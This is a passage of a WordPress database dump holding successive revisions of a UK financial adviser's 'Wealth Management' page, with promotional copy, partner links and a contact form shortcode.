Cart\",\"page_smoothHeight\":\"false\",\"flex_smoothHeight\":\"false\",\"language_flag\":\"ICL_LANGUAGE_CODE\",\"infinite_blog_finished_msg\":\"<em>All posts displayed</em>\",\"infinite_blog_text\":\"<em>Loading the next set of posts...</em>\",\"portfolio_loading_text\":\"<em>Loading Portfolio Items...</em>\",\"faqs_loading_text\":\"<em>Loading FAQ Items...</em>\",\"order_actions\":\"Details\"};\r\n/* ]]]]><![CDATA[> */\r\n]]></script><script src=\"../wp-content/themes/Avada/js/main.js\" type=\"text/javascript\">// <![CDATA[\r\n<script type=\"text/javascript\" src=\"../scripts.hellobar.com/565e6e29d8b6bfca77549154aee8b14f23536824.js\"/></body></p>\r\n// ]]></script></div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>','The New Individual Savings Accounts','Read about','inherit','closed','closed','','84-revision-v1','','','2017-09-21 17:40:06','2017-09-21 17:40:06','',84,'http://www.equalitywalk.org.uk/84-revision-v1',0,'revision','',0),(335,1,'2017-10-12 11:23:57','2017-10-12 11:23:57','<a href=\"/\"><img class=\"aligncenter wp-image-230\" src=\"http://www.equalitywalk.org.uk/wp-content/uploads/2017/09/moremoney-1024x759.jpg\" alt=\"Wealth Management - investing\" width=\"700\" height=\"519\" /></a>\n<div>\n<div class=\"one_half\">\n<div id=\"reading-box-container-1\" class=\"reading-box-container clearfix\"><section class=\"reading-box \" style=\"background-color: #f6f6f6 !important; border-left-width: 3px !important; border-left-color: #afd9a5!important; border: 1px solid #f6f6f6!important;\">\n<h2>Learn How to Manage Your Wealth and Investments</h2>\n<strong>A successful wealth management philosophy</strong> is based on the idea that small changes can yield enormous gains in your family’s finances. <a href=\"http://www.equalitywalk.org.uk/lump-sum-investment\">Smart investments</a> can make you money over many years.\n\nYou need to decide what you want to accomplish. If we were to meet one year from today what would have to happen in your life both personally and financially for you to be happy with the results?\n\nYou could:\n<ul>\n 	<li>Pay off debts permanently</li>\n 	<li>Fund your children’s education fees</li>\n 	<li>Have<a href=\"http://www.equalitywalk.org.uk/pension-advice-will-you-have-enough-income-when-you-retire\"> savings for retiremen</a>t</li>\n</ul>\n<h3>Manage your investments</h3>\nWe believe that truly independent advice that is not restricted in any way, will allow you to <a href=\"http://www.equalitywalk.org.uk/investments-from-equity-smart\">consider the financial products</a> that will help you secure the returns that the market allows.\n\nStarting with a plan that is your plan and then building in an investment strategy on top of that, based on a purely fee based solution, without the commissions and non transparent charges, is the best approach to solving our clients financial planning challenges.\n<h3>Look at different options such as investing in property developments<strong>\n</strong></h3>\nDevelopments across London and the South East for example can provide a much greater return than investing the same amount of money into a standard savings account.\n\nAs financial advisors we can direct you to <strong>our trusted partners Hunter Finance</strong> who are experts in property loans.\n\n<strong><a href=\"https://www.hunterfinance.co.uk/property-development-finance/why-choose-us\" target=\"_blank\">Click here to find out why </a>you should choose property development funding.</strong>\n\n&nbsp;\n\n</section></div>\n</div>\n<div class=\"one_half last\">\n<div class=\"accordian\">\n<h5 class=\"toggle active\">Provide<a href=\"http://www.chartwell-investment.co.uk/contentcofunds-htm\" target=\"_blank\"> Independent Investment Advice</a></h5>\n<div class=\"toggle-content default-open\" style=\"display: block;\">\n\nWe are here to recommend the best way forward for you, whether that is opening savings accounts or investing in residential property developments.\n<ul class=\"list-icon circle-yes list-icon-arrow\">\n<ul class=\"list-icon circle-yes list-icon-arrow\">\n 	<li>ensure you understand and organise your finances with a customer centric, advice driven approach.</li>\n 	<li><a href=\"http://scottandpaterson.co.uk\" target=\"_blank\">qualified and experienced accountants</a> taking care of your finances</li>\n 	<li>identify what you really want to achieve from your money and why this is important to you.</li>\n 	<li>establish a long-term relationship based on outcomes and trust, not one based on the need to keep selling products.</li>\n 	<li>a service driven by the real outcomes you will wish to achieve such as financial freedom and peace of mind.</li>\n 	<li>ongoing support with regular updates and reviews.</li>\n 	<li>a simplified process with a structured, service-based fee scale.</li>\n 	<li>a choice of financial serviced levels dependent upon your circumstances and preferences.</li>\n</ul>\n</ul>\n</div>\n</div>\n<b>Managing Your Wealth is NOT as Complex as You Think.</b>\n\n&nbsp;\n\nThanks to our advice given approach, we can make your life simpler. You’ll know exactly what the best choices are and how to make them to ensure a more prosperous and secure future.\n\n&nbsp;\n\nCall us today on  to schedule a complimentary initial consultation and discover how Equity SMART highly personalised approach to wealth management can make the difference you need.\n\n&nbsp;\n\n</div>\n<div class=\"clearboth\"></div>\n<p style=\"text-align: center;\"><big><big><big>Wealth Management Services</big></big></big></p>\n&nbsp;\n<p style=\"text-align: center;\">Select the area of wealth management if you have a specific area you are interested in:</p>\n\n<div class=\"one_third\">\n<h2>Targeted Wealth Planning</h2>\nChoose our targeted Wealth Management service if you have a specific need for advice like investing for a special goal, building up at retirement nest egg,  insurance planning or maybe you need an impartial second opinion on current investments.\n\n</div>\n<h2 class=\"one_third\">Comprehensive Wealth Planning</h2>\n<h2 class=\"one_third\"></h2>\n<p class=\"one_third\">Most families realise they need an advisor who is an expert in multiple areas of finance. Many financial advisors claim to offer such services. But the real challenge is to work on the whole package, of financial planning – life goals – investments – estate preservation and tax mitigation, which is the true calling of our comprehensive wealth management service.</p>\n\n<h2>It’s all so simple. To book a chat with our independent financial advisors.</h2>\nIt\'s free, without obligation and impartial click the link or call free on .\n<h3><a href=\"http://www.equalitywalk.org.uk/contact\">Contact Us for free advice</a></h3>\n</div>','Wealth Management','','inherit','closed','closed','','115-autosave-v1','','','2017-10-12 11:23:57','2017-10-12 11:23:57','',115,'http://www.equalitywalk.org.uk/115-autosave-v1',0,'revision','',0),(336,1,'2017-10-12 11:05:51','2017-10-12 11:05:51','&nbsp;\r\n<div>\r\n<div class=\"one_half\">\r\n<div id=\"reading-box-container-1\" class=\"reading-box-container clearfix\"><section class=\"reading-box \" style=\"background-color: #f6f6f6 !important; border-left-width: 3px !important; border-left-color: #afd9a5!important; border: 1px solid #f6f6f6!important;\">\r\n<h2>21st Century Wealth Management</h2>\r\n<strong>A successful wealth management philosophy</strong> is based on the idea that small changes can yield enormous gains in your family’s finances. Smart investments can make you money over many years.\r\n\r\nAs your financial coach we want to know what you want to accomplish. If we were to meet one year from today what would have to happen in your life both personally and financially for you to be happy with the results?\r\n\r\nWe can help you:\r\n<ul>\r\n 	<li>Pay off debts permanently</li>\r\n 	<li>Fund your children’s education fees</li>\r\n 	<li>Have savings for retirement</li>\r\n</ul>\r\n<h3>Manage your investments</h3>\r\nWe believe that truly independent advice that is not restricted in any way, will allow us to consider the financial products that will help us secure the returns that the market allows us to capture.\r\n\r\nStarting with a plan that is your plan and then building in an investment strategy on top of that, based on a purely fee based solution, without the commissions and non transparent charges, is the best approach to solving our clients financial planning challenges.\r\n\r\n<strong>We recommend looking at different options such as investing in property</strong>. Developments across London and the South East for example can provide a much greater return than investing the same amount of money into a standard savings account. As financial advisors we can direct you to our trusted partners who are experts in property loans. <a href=\"https://www.hunterfinance.co.uk/property-development-finance\" target=\"_blank\">Click here to find out more </a>about funding for property development.\r\n\r\n&nbsp;\r\n\r\n</section></div>\r\n</div>\r\n<div class=\"one_half last\">\r\n<div class=\"accordian\">\r\n<h5 class=\"toggle active\">Provide Independent Investment Advice</h5>\r\n<div class=\"toggle-content default-open\" style=\"display: block;\">\r\n\r\nWe are here to recommend the best way forward for you, whether that is opening savings accounts or investing in property developments.\r\n<ul class=\"list-icon circle-yes list-icon-arrow\">\r\n<ul class=\"list-icon circle-yes list-icon-arrow\">\r\n 	<li>ensure you understand and organise your finances with a customer centric, advice driven approach.</li>\r\n</ul>\r\n</ul>\r\n&nbsp;\r\n<ul class=\"list-icon circle-yes list-icon-arrow\">\r\n<ul class=\"list-icon circle-yes list-icon-arrow\">\r\n 	<li>identify what you really want to achieve from your money and why this is important to you.</li>\r\n</ul>\r\n</ul>\r\n&nbsp;\r\n<ul class=\"list-icon circle-yes list-icon-arrow\">\r\n<ul class=\"list-icon circle-yes list-icon-arrow\">\r\n 	<li>establish a long-term relationship based on outcomes and trust, not one based on the need to keep selling products.</li>\r\n</ul>\r\n</ul>\r\n&nbsp;\r\n<ul class=\"list-icon circle-yes list-icon-arrow\">\r\n<ul class=\"list-icon circle-yes list-icon-arrow\">\r\n 	<li>a service driven by the real outcomes you will wish to achieve such as financial freedom and peace of mind.</li>\r\n</ul>\r\n</ul>\r\n&nbsp;\r\n<ul class=\"list-icon circle-yes list-icon-arrow\">\r\n<ul class=\"list-icon circle-yes list-icon-arrow\">\r\n 	<li>ongoing support with regular updates and reviews.</li>\r\n</ul>\r\n</ul>\r\n&nbsp;\r\n<ul class=\"list-icon circle-yes list-icon-arrow\">\r\n<ul class=\"list-icon circle-yes list-icon-arrow\">\r\n 	<li>a simplified process with a structured, service-based fee scale.</li>\r\n</ul>\r\n</ul>\r\n&nbsp;\r\n<ul class=\"list-icon circle-yes list-icon-arrow\">\r\n<ul class=\"list-icon circle-yes list-icon-arrow\">\r\n 	<li>a choice of financial serviced levels dependent upon your circumstances and preferences.</li>\r\n</ul>\r\n</ul>\r\n</div>\r\n</div>\r\n<b>Managing Your Wealth is NOT as Complex as You Think.</b>\r\n\r\n&nbsp;\r\n\r\nThanks to our advice given approach, we can make your life simpler. You’ll know exactly what the best choices are and how to make them to ensure a more prosperous and secure future.\r\n\r\n&nbsp;\r\n\r\nCall us today on  to schedule a complimentary initial consultation and discover how Equity SMART highly personalised approach to wealth management can make the difference you need.\r\n\r\n&nbsp;\r\n\r\n</div>\r\n<div class=\"clearboth\"></div>\r\n<p style=\"text-align: center;\"><big><big><big>Wealth Management Services</big></big></big></p>\r\n&nbsp;\r\n<p style=\"text-align: center;\">Select the area of wealth management if you have a specific area you are interested in:</p>\r\n\r\n<div class=\"one_third\">\r\n&nbsp;\r\n<h2>Targeted Wealth Planning</h2>\r\nChoose our targeted Wealth Management service if you have a specific need for advice like investing for a special goal, building up at retirement nest egg,  insurance planning or maybe you need an impartial second opinion on current investments.\r\n\r\n</div>\r\n<h2 class=\"one_third\">Comprehensive Wealth Planning</h2>\r\n<h2 class=\"one_third\"></h2>\r\n<p class=\"one_third\">Most families realise they need an advisor who is an expert in multiple areas of finance. Many financial advisors claim to offer such services. But the real challenge is to work on the whole package, of financial planning – life goals – investments – estate preservation and tax mitigation, which is the true calling of our comprehensive wealth management service.</p>\r\n\r\n<h2>It’s all so simple. To book a chat with our independent financial advisors.</h2>\r\nIt\'s free, without obligation and impartial click the link or call free on .\r\n\r\n<a class=\"continue mobile-button button large default\" href=\"../contact-us/\" target=\"\">Contact Us Today</a>\r\n\r\n</div>','Wealth Management','','inherit','closed','closed','','115-revision-v1','','','2017-10-12 11:05:51','2017-10-12 11:05:51','',115,'http://www.equalitywalk.org.uk/115-revision-v1',0,'revision','',0),(337,1,'2017-10-12 11:06:46','2017-10-12 11:06:46','[contact-form-7 id=\"4\" title=\"Contact form 1\"]','Contact','','publish','closed','closed','','contact','','','2017-10-12 11:07:19','2017-10-12 11:07:19','',0,'http://www.equalitywalk.org.uk/?page_id=337',0,'page','',0),(338,1,'2017-10-12 11:06:46','2017-10-12 11:06:46','','Contact','','inherit','closed','closed','','337-revision-v1','','','2017-10-12 11:06:46','2017-10-12 11:06:46','',337,'http://www.equalitywalk.org.uk/337-revision-v1',0,'revision','',0),(339,1,'2017-10-12 11:07:19','2017-10-12 11:07:19','[contact-form-7 id=\"4\" title=\"Contact form 1\"]','Contact','','inherit','closed','closed','','337-revision-v1','','','2017-10-12 11:07:19','2017-10-12 11:07:19','',337,'http://www.equalitywalk.org.uk/337-revision-v1',0,'revision','',0),(340,1,'2017-10-12 11:07:50','2017-10-12 11:07:50','&nbsp;\r\n<div>\r\n<div class=\"one_half\">\r\n<div id=\"reading-box-container-1\" class=\"reading-box-container clearfix\"><section class=\"reading-box \" style=\"background-color: #f6f6f6 !important; border-left-width: 3px !important; border-left-color: #afd9a5!important; border: 1px solid #f6f6f6!important;\">\r\n<h2>21st Century Wealth Management</h2>\r\n<strong>A successful wealth management philosophy</strong> is based on the idea that small changes can yield enormous gains in your family’s finances. Smart investments can make you money over many years.\r\n\r\nAs your financial coach we want to know what you want to accomplish. If we were to meet one year from today what would have to happen in your life both personally and financially for you to be happy with the results?\r\n\r\nWe can help you:\r\n<ul>\r\n 	<li>Pay off debts permanently</li>\r\n 	<li>Fund your children’s education fees</li>\r\n 	<li>Have savings for retirement</li>\r\n</ul>\r\n<h3>Manage your investments</h3>\r\nWe believe that truly independent advice that is not restricted in any way, will allow us to consider the financial products that will help us secure the returns that the market allows us to capture.\r\n\r\nStarting with a plan that is your plan and then building in an investment strategy on top of that, based on a purely fee based solution, without the commissions and non transparent charges, is the best approach to solving our clients financial planning challenges.\r\n\r\n<strong>We recommend looking at different options such as investing in property</strong>. Developments across London and the South East for example can provide a much greater return than investing the same amount of money into a standard savings account. As financial advisors we can direct you to our trusted partners who are experts in property loans. <a href=\"https://www.hunterfinance.co.uk/property-development-finance\" target=\"_blank\">Click here to find out more </a>about funding for property development.\r\n\r\n&nbsp;\r\n\r\n</section></div>\r\n</div>\r\n<div class=\"one_half last\">\r\n<div class=\"accordian\">\r\n<h5 class=\"toggle active\">Provide Independent Investment Advice</h5>\r\n<div class=\"toggle-content default-open\" style=\"display: block;\">\r\n\r\nWe are here to recommend the best way forward for you, whether that is opening savings accounts or investing in property developments.\r\n<ul class=\"list-icon circle-yes list-icon-arrow\">\r\n<ul class=\"list-icon circle-yes list-icon-arrow\">\r\n 	<li>ensure you understand and organise your finances with a customer centric, advice driven approach.</li>\r\n</ul>\r\n</ul>\r\n&nbsp;\r\n<ul class=\"list-icon circle-yes list-icon-arrow\">\r\n<ul class=\"list-icon circle-yes list-icon-arrow\">\r\n 	<li>identify what you really want to achieve from your money and why this is important to you.</li>\r\n</ul>\r\n</ul>\r\n&nbsp;\r\n<ul class=\"list-icon circle-yes list-icon-arrow\">\r\n<ul class=\"list-icon circle-yes list-icon-arrow\">\r\n 	<li>establish a long-term relationship based on outcomes and trust, not one based on the need to keep selling products.</li>\r\n</ul>\r\n</ul>\r\n&nbsp;\r\n<ul class=\"list-icon circle-yes list-icon-arrow\">\r\n<ul class=\"list-icon circle-yes list-icon-arrow\">\r\n 	<li>a service driven by the real outcomes you will wish to achieve such as financial freedom and peace of mind.</li>\r\n</ul>\r\n</ul>\r\n&nbsp;\r\n<ul class=\"list-icon circle-yes list-icon-arrow\">\r\n<ul class=\"list-icon circle-yes list-icon-arrow\">\r\n 	<li>ongoing support with regular updates and reviews.</li>\r\n</ul>\r\n</ul>\r\n&nbsp;\r\n<ul class=\"list-icon circle-yes list-icon-arrow\">\r\n<ul class=\"list-icon circle-yes list-icon-arrow\">\r\n 	<li>a simplified process with a structured, service-based fee scale.</li>\r\n</ul>\r\n</ul>\r\n&nbsp;\r\n<ul class=\"list-icon circle-yes list-icon-arrow\">\r\n<ul class=\"list-icon circle-yes list-icon-arrow\">\r\n 	<li>a choice of financial serviced levels dependent upon your circumstances and preferences.</li>\r\n</ul>\r\n</ul>\r\n</div>\r\n</div>\r\n<b>Managing Your Wealth is NOT as Complex as You Think.</b>\r\n\r\n&nbsp;\r\n\r\nThanks to our advice given approach, we can make your life simpler. You’ll know exactly what the best choices are and how to make them to ensure a more prosperous and secure future.\r\n\r\n&nbsp;\r\n\r\nCall us today on  to schedule a complimentary initial consultation and discover how Equity SMART highly personalised approach to wealth management can make the difference you need.\r\n\r\n&nbsp;\r\n\r\n</div>\r\n<div class=\"clearboth\"></div>\r\n<p style=\"text-align: center;\"><big><big><big>Wealth Management Services</big></big></big></p>\r\n&nbsp;\r\n<p style=\"text-align: center;\">Select the area of wealth management if you have a specific area you are interested in:</p>\r\n\r\n<div class=\"one_third\">\r\n<h2>Targeted Wealth Planning</h2>\r\nChoose our targeted Wealth Management service if you have a specific need for advice like investing for a special goal, building up at retirement nest egg,  insurance planning or maybe you need an impartial second opinion on current investments.\r\n\r\n</div>\r\n<h2 class=\"one_third\">Comprehensive Wealth Planning</h2>\r\n<h2 class=\"one_third\"></h2>\r\n<p class=\"one_third\">Most families realise they need an advisor who is an expert in multiple areas of finance. Many financial advisors claim to offer such services. But the real challenge is to work on the whole package, of financial planning – life goals – investments – estate preservation and tax mitigation, which is the true calling of our comprehensive wealth management service.</p>\r\n\r\n<h2>It’s all so simple. To book a chat with our independent financial advisors.</h2>\r\nIt\'s free, without obligation and impartial click the link or call free on .\r\n<h3><a href=\"http://www.equalitywalk.org.uk/contact\">Contact Us for free advice</a></h3>\r\n</div>','Wealth Management','','inherit','closed','closed','','115-revision-v1','','','2017-10-12 11:07:50','2017-10-12 11:07:50','',115,'http://www.equalitywalk.org.uk/115-revision-v1',0,'revision','',0),(341,1,'2017-10-12 11:12:33','2017-10-12 11:12:33','&nbsp;\r\n<div>\r\n<div class=\"one_half\">\r\n<div id=\"reading-box-container-1\" class=\"reading-box-container clearfix\"><section class=\"reading-box \" style=\"background-color: #f6f6f6 !important; border-left-width: 3px !important; border-left-color: #afd9a5!important; border: 1px solid #f6f6f6!important;\">\r\n<h2>21st Century Wealth Management</h2>\r\n<strong>A successful wealth management philosophy</strong> is based on the idea that small changes can yield enormous gains in your family’s finances. Smart investments can make you money over many years.\r\n\r\nYou need to decide what you want to accomplish. If we were to meet one year from today what would have to happen in your life both personally and financially for you to be happy with the results?\r\n\r\nYou could:\r\n<ul>\r\n 	<li>Pay off debts permanently</li>\r\n 	<li>Fund your children’s education fees</li>\r\n 	<li>Have savings for retirement</li>\r\n</ul>\r\n<h3>Manage your investments</h3>\r\nWe believe that truly independent advice that is not restricted in any way, will allow you to consider the financial products that will help you secure the returns that the market allows.\r\n\r\nStarting with a plan that is your plan and then building in an investment strategy on top of that, based on a purely fee based solution, without the commissions and non transparent charges, is the best approach to solving our clients financial planning challenges.\r\n\r\n<strong>We recommend looking at different options such as investing in property</strong>. Developments across London and the South East for example can provide a much greater return than investing the same amount of money into a standard savings account.\r\n\r\nAs financial advisors we can direct you to our trusted partners Hunter Finance who are experts in property loans. <a href=\"https://www.hunterfinance.co.uk/property-development-finance/why-choose-us\" target=\"_blank\">Click here to find out why </a>you should choose property development funding.\r\n\r\n&nbsp;\r\n\r\n</section></div>\r\n</div>\r\n<div class=\"one_half last\">\r\n<div class=\"accordian\">\r\n<h5 class=\"toggle active\">Provide Independent Investment Advice</h5>\r\n<div class=\"toggle-content default-open\" style=\"display: block;\">\r\n\r\nWe are here to recommend the best way forward for you, whether that is opening savings accounts or investing in property developments.\r\n<ul class=\"list-icon circle-yes list-icon-arrow\">\r\n<ul class=\"list-icon circle-yes list-icon-arrow\">\r\n 	<li>ensure you understand and organise your finances with a customer centric, advice driven approach.</li>\r\n</ul>\r\n</ul>\r\n&nbsp;\r\n<ul class=\"list-icon circle-yes list-icon-arrow\">\r\n<ul class=\"list-icon circle-yes list-icon-arrow\">\r\n 	<li>identify what you really want to achieve from your money and why this is important to you.</li>\r\n</ul>\r\n</ul>\r\n&nbsp;\r\n<ul class=\"list-icon circle-yes list-icon-arrow\">\r\n<ul class=\"list-icon circle-yes list-icon-arrow\">\r\n 	<li>establish a long-term relationship based on outcomes and trust, not one based on the need to keep selling products.</li>\r\n</ul>\r\n</ul>\r\n&nbsp;\r\n<ul class=\"list-icon circle-yes list-icon-arrow\">\r\n<ul class=\"list-icon circle-yes list-icon-arrow\">\r\n 	<li>a service driven by the real outcomes you will wish to achieve such as financial freedom and peace of mind.</li>\r\n</ul>\r\n</ul>\r\n&nbsp;\r\n<ul class=\"list-icon circle-yes list-icon-arrow\">\r\n<ul class=\"list-icon circle-yes list-icon-arrow\">\r\n 	<li>ongoing support with regular updates and reviews.</li>\r\n</ul>\r\n</ul>\r\n&nbsp;\r\n<ul class=\"list-icon circle-yes list-icon-arrow\">\r\n<ul class=\"list-icon circle-yes list-icon-arrow\">\r\n 	<li>a simplified process with a structured, service-based fee scale.</li>\r\n</ul>\r\n</ul>\r\n&nbsp;\r\n<ul class=\"list-icon circle-yes list-icon-arrow\">\r\n<ul class=\"list-icon circle-yes list-icon-arrow\">\r\n 	<li>a choice of financial serviced levels dependent upon your circumstances and preferences.</li>\r\n</ul>\r\n</ul>\r\n</div>\r\n</div>\r\n<b>Managing Your Wealth is NOT as Complex as You Think.</b>\r\n\r\n&nbsp;\r\n\r\nThanks to our advice given approach, we can make your life simpler. You’ll know exactly what the best choices are and how to make them to ensure a more prosperous and secure future.\r\n\r\n&nbsp;\r\n\r\nCall us today on  to schedule a complimentary initial consultation and discover how Equity SMART highly personalised approach to wealth management can make the difference you need.\r\n\r\n&nbsp;\r\n\r\n</div>\r\n<div class=\"clearboth\"></div>\r\n<p style=\"text-align: center;\"><big><big><big>Wealth Management Services</big></big></big></p>\r\n&nbsp;\r\n<p style=\"text-align: center;\">Select the area of wealth management if you have a specific area you are interested in:</p>\r\n\r\n<div class=\"one_third\">\r\n<h2>Targeted Wealth Planning</h2>\r\nChoose our targeted Wealth Management service if you have a specific need for advice like investing for a special goal, building up at retirement nest egg,  insurance planning or maybe you need an impartial second opinion on current investments.\r\n\r\n</div>\r\n<h2 class=\"one_third\">Comprehensive Wealth Planning</h2>\r\n<h2 class=\"one_third\"></h2>\r\n<p class=\"one_third\">Most families realise they need an advisor who is an expert in multiple areas of finance. Many financial advisors claim to offer such services. But the real challenge is to work on the whole package, of financial planning – life goals – investments – estate preservation and tax mitigation, which is the true calling of our comprehensive wealth management service.</p>\r\n\r\n<h2>It’s all so simple. To book a chat with our independent financial advisors.</h2>\r\nIt\'s free, without obligation and impartial click the link or call free on .\r\n<h3><a href=\"http://www.equalitywalk.org.uk/contact\">Contact Us for free advice</a></h3>\r\n</div>','Wealth Management','','inherit','closed','closed','','115-revision-v1','','','2017-10-12 11:12:33','2017-10-12 11:12:33','',115,'http://www.equalitywalk.org.uk/115-revision-v1',0,'revision','',0),(342,1,'2017-10-12 11:15:05','2017-10-12 11:15:05','<img class=\"aligncenter size-large wp-image-230\" src=\"http://www.equalitywalk.org.uk/wp-content/uploads/2017/09/moremoney-1024x759.jpg\" alt=\"\" width=\"790\" height=\"586\" />\r\n<div>\r\n<div class=\"one_half\">\r\n<div id=\"reading-box-container-1\" class=\"reading-box-container clearfix\"><section class=\"reading-box \" style=\"background-color: #f6f6f6 !important; border-left-width: 3px !important; border-left-color: #afd9a5!important; border: 1px solid #f6f6f6!important;\">\r\n<h2>21st Century Wealth Management</h2>\r\n<strong>A successful wealth management philosophy</strong> is based on the idea that small changes can yield enormous gains in your family’s finances. Smart investments can make you money over many years.\r\n\r\nYou need to decide what you want to accomplish. If we were to meet one year from today what would have to happen in your life both personally and financially for you to be happy with the results?\r\n\r\nYou could:\r\n<ul>\r\n 	<li>Pay off debts permanently</li>\r\n 	<li>Fund your children’s education fees</li>\r\n 	<li>Have savings for retirement</li>\r\n</ul>\r\n<h3>Manage your investments</h3>\r\nWe believe that truly independent advice that is not restricted in any way, will allow you to consider the financial products that will help you secure the returns that the market allows.\r\n\r\nStarting with a plan that is your plan and then building in an investment strategy on top of that, based on a purely fee based solution, without the commissions and non transparent charges, is the best approach to solving our clients financial planning challenges.\r\n<h3>Look at different options such as investing in property developments<strong>\r\n</strong></h3>\r\nDevelopments across London and the South East for example can provide a much greater return than investing the same amount of money into a standard savings account.\r\n\r\nAs financial advisors we can direct you to <strong>our trusted partners Hunter Finance</strong> who are experts in property loans.\r\n\r\n<strong><a href=\"https://www.hunterfinance.co.uk/property-development-finance/why-choose-us\" target=\"_blank\">Click here to find out why </a>you should choose property development funding.</strong>\r\n\r\n&nbsp;\r\n\r\n</section></div>\r\n</div>\r\n<div class=\"one_half last\">\r\n<div class=\"accordian\">\r\n<h5 class=\"toggle active\">Provide Independent Investment Advice</h5>\r\n<div class=\"toggle-content default-open\" style=\"display: block;\">\r\n\r\nWe are here to recommend the best way forward for you, whether that is opening savings accounts or investing in property developments.\r\n<ul class=\"list-icon circle-yes list-icon-arrow\">\r\n<ul class=\"list-icon circle-yes list-icon-arrow\">\r\n 	<li>ensure you understand and organise your finances with a customer centric, advice driven approach.</li>\r\n</ul>\r\n</ul>\r\n&nbsp;\r\n<ul class=\"list-icon circle-yes list-icon-arrow\">\r\n<ul class=\"list-icon circle-yes list-icon-arrow\">\r\n 	<li>identify what you really want to achieve from your money and why this is important to you.</li>\r\n</ul>\r\n</ul>\r\n&nbsp;\r\n<ul class=\"list-icon circle-yes list-icon-arrow\">\r\n<ul class=\"list-icon circle-yes list-icon-arrow\">\r\n 	<li>establish a long-term relationship based on outcomes and trust, not one based on the need to keep selling products.</li>\r\n</ul>\r\n</ul>\r\n&nbsp;\r\n<ul class=\"list-icon circle-yes list-icon-arrow\">\r\n<ul class=\"list-icon circle-yes list-icon-arrow\">\r\n 	<li>a service driven by the real outcomes you will wish to achieve such as financial freedom and peace of mind.</li>\r\n</ul>\r\n</ul>\r\n&nbsp;\r\n<ul class=\"list-icon circle-yes list-icon-arrow\">\r\n<ul class=\"list-icon circle-yes list-icon-arrow\">\r\n 	<li>ongoing support with regular updates and reviews.</li>\r\n</ul>\r\n</ul>\r\n&nbsp;\r\n<ul class=\"list-icon circle-yes list-icon-arrow\">\r\n<ul class=\"list-icon circle-yes list-icon-arrow\">\r\n 	<li>a simplified process with a structured, service-based fee scale.</li>\r\n</ul>\r\n</ul>\r\n&nbsp;\r\n<ul class=\"list-icon circle-yes list-icon-arrow\">\r\n<ul class=\"list-icon circle-yes list-icon-arrow\">\r\n 	<li>a choice of financial serviced levels dependent upon your circumstances and preferences.</li>\r\n</ul>\r\n</ul>\r\n</div>\r\n</div>\r\n<b>Managing Your Wealth is NOT as Complex as You Think.</b>\r\n\r\n&nbsp;\r\n\r\nThanks to our advice given approach, we can make your life simpler. You’ll know exactly what the best choices are and how to make them to ensure a more prosperous and secure future.\r\n\r\n&nbsp;\r\n\r\nCall us today on  to schedule a complimentary initial consultation and discover how Equity SMART highly personalised approach to wealth management can make the difference you need.\r\n\r\n&nbsp;\r\n\r\n</div>\r\n<div class=\"clearboth\"></div>\r\n<p style=\"text-align: center;\"><big><big><big>Wealth Management Services</big></big></big></p>\r\n&nbsp;\r\n<p style=\"text-align: center;\">Select the area of wealth management if you have a specific area you are interested in:</p>\r\n\r\n<div class=\"one_third\">\r\n<h2>Targeted Wealth Planning</h2>\r\nChoose our targeted Wealth Management service if you have a specific need for advice like investing for a special goal, building up at retirement nest egg,  insurance planning or maybe you need an impartial second opinion on current investments.\r\n\r\n</div>\r\n<h2 class=\"one_third\">Comprehensive Wealth Planning</h2>\r\n<h2 class=\"one_third\"></h2>\r\n<p class=\"one_third\">Most families realise they need an advisor who is an expert in multiple areas of finance. Many financial advisors claim to offer such services. But the real challenge is to work on the whole package, of financial planning – life goals – investments – estate preservation and tax mitigation, which is the true calling of our comprehensive wealth management service.</p>\r\n\r\n<h2>It’s all so simple. To book a chat with our independent financial advisors.</h2>\r\nIt\'s free, without obligation and impartial click the link or call free on .\r\n<h3><a href=\"http://www.equalitywalk.org.uk/contact\">Contact Us for free advice</a></h3>\r\n</div>','Wealth Management','','inherit','closed','closed','','115-revision-v1','','','2017-10-12 11:15:05','2017-10-12 11:15:05','',115,'http://www.equalitywalk.org.uk/115-revision-v1',0,'revision','',0),(343,1,'2017-10-12 11:16:35','2017-10-12 11:16:35','<a href=\"/\"><img class=\"aligncenter wp-image-230\" src=\"http://www.equalitywalk.org.uk/wp-content/uploads/2017/09/moremoney-1024x759.jpg\" alt=\"Wealth Management - investing\" width=\"700\" height=\"519\" /></a>\r\n<div>\r\n<div class=\"one_half\">\r\n<div id=\"reading-box-container-1\" class=\"reading-box-container clearfix\"><section class=\"reading-box \" style=\"background-color: #f6f6f6 !important; border-left-width: 3px !important; border-left-color: #afd9a5!important; border: 1px solid #f6f6f6!important;\">\r\n<h2>21st Century Wealth Management</h2>\r\n<strong>A successful wealth management philosophy</strong> is based on the idea that small changes can yield enormous gains in your family’s finances. Smart investments can make you money over many years.\r\n\r\nYou need to decide what you want to accomplish. If we were to meet one year from today what would have to happen in your life both personally and financially for you to be happy with the results?\r\n\r\nYou could:\r\n<ul>\r\n 	<li>Pay off debts permanently</li>\r\n 	<li>Fund your children’s education fees</li>\r\n 	<li>Have savings for retirement</li>\r\n</ul>\r\n<h3>Manage your investments</h3>\r\nWe believe that truly independent advice that is not restricted in any way, will allow you to consider the financial products that will help you secure the returns that the market allows.\r\n\r\nStarting with a plan that is your plan and then building in an investment strategy on top of that, based on a purely fee based solution, without the commissions and non transparent charges, is the best approach to solving our clients financial planning challenges.\r\n<h3>Look at different options such as investing in property developments<strong>\r\n</strong></h3>\r\nDevelopments across London and the South East for example can provide a much greater return than investing the same amount of money into a standard savings account.\r\n\r\nAs financial advisors we can direct you to <strong>our trusted partners Hunter Finance</strong> who are experts in property loans.\r\n\r\n<strong><a href=\"https://www.hunterfinance.co.uk/property-development-finance/why-choose-us\" target=\"_blank\">Click here to find out why </a>you should choose property development funding.</strong>\r\n\r\n&nbsp;\r\n\r\n</section></div>\r\n</div>\r\n<div class=\"one_half last\">\r\n<div class=\"accordian\">\r\n<h5 class=\"toggle active\">Provide Independent Investment Advice</h5>\r\n<div class=\"toggle-content default-open\" style=\"display: block;\">\r\n\r\nWe are here to recommend the best way forward for you, whether that is opening savings accounts or investing in property developments.\r\n<ul class=\"list-icon circle-yes list-icon-arrow\">\r\n<ul class=\"list-icon circle-yes list-icon-arrow\">\r\n 	<li>ensure you understand and organise your finances with a customer centric, advice driven approach.</li>\r\n</ul>\r\n</ul>\r\n&nbsp;\r\n<ul class=\"list-icon circle-yes list-icon-arrow\">\r\n<ul class=\"list-icon circle-yes list-icon-arrow\">\r\n 	<li>identify what you really want to achieve from your money and why this is important to you.</li>\r\n</ul>\r\n</ul>\r\n&nbsp;\r\n<ul 